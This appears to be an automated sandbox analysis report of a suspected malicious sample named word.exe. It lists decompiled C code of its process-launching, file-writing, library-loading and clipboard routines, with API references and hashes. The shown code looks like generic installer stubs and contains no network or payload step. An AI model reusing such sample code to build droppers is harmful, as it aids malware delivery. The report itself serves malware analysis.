                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                    • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                    • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                    • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                    0x00405c54
                                    0x00405c74
                                    0x00405c7c
                                    0x00405c81
                                    0x00000000
                                    0x00405c87
                                    0x00405c8b

                                    APIs
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000), ref: 00405C74
                                    • CloseHandle.KERNEL32(?), ref: 00405C81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3712363035-0
                                    • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                    • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                    • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                    • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                    0x00406a3d
                                    0x00406a40
                                    0x00406a47
                                    0x00406a4f
                                    0x00406a5b
                                    0x00000000
                                    0x00406a62
                                    0x00406a52
                                    0x00406a59
                                    0x00000000
                                    0x00406a6a
                                    0x00000000

                                    APIs
                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                      • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                      • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                      • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                    • String ID:
                                    • API String ID: 2547128583-0
                                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                    • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                    • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                    0x0040615c
                                    0x00406169
                                    0x0040617e
                                    0x00406184

                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 0040615C
                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: File$AttributesCreate
                                    • String ID:
                                    • API String ID: 415043291-0
                                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                    0x00406138
                                    0x0040613e
                                    0x00406143
                                    0x0040614c
                                    0x0040614c
                                    0x00406155

                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                    • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                    • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                    0x00405c1c
                                    0x00405c24
                                    0x00000000
                                    0x00405c2a
                                    0x00000000

                                    APIs
                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                    • GetLastError.KERNEL32 ref: 00405C2A
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CreateDirectoryErrorLast
                                    • String ID:
                                    • API String ID: 1375471231-0
                                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                    • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                    • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                    0x0040620e
                                    0x0040621e
                                    0x00406226
                                    0x00000000
                                    0x0040622d
                                    0x00000000
                                    0x0040622f

                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0040621E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                    • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                    • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                    0x00403606
                                    0x0040360c

                                    APIs
                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                    0x00401faa
                                    0x00401faf
                                    0x00401fb5
                                    0x00401fba
                                    0x00401fbe
                                    0x0040292e
                                    0x00401fc4
                                    0x00401fc7
                                    0x00401fca
                                    0x00401fd2
                                    0x00401fe1
                                    0x00401fe3
                                    0x00401fe3
                                    0x00401fd4
                                    0x00401fd8
                                    0x00401fd8
                                    0x00401fd2
                                    0x00401fea
                                    0x00401feb
                                    0x00401feb
                                    0x00402c2d
                                    0x00402c39

                                    APIs
                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
                                      • Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                      • Part of subcall function 00405C4B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000), ref: 00405C74
                                      • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                    • CloseHandle.KERNEL32(?), ref: 00401FEB
                                      • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                      • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B13
                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                    • String ID:
                                    • API String ID: 2972824698-0
                                    • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                    • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                    • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                    • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
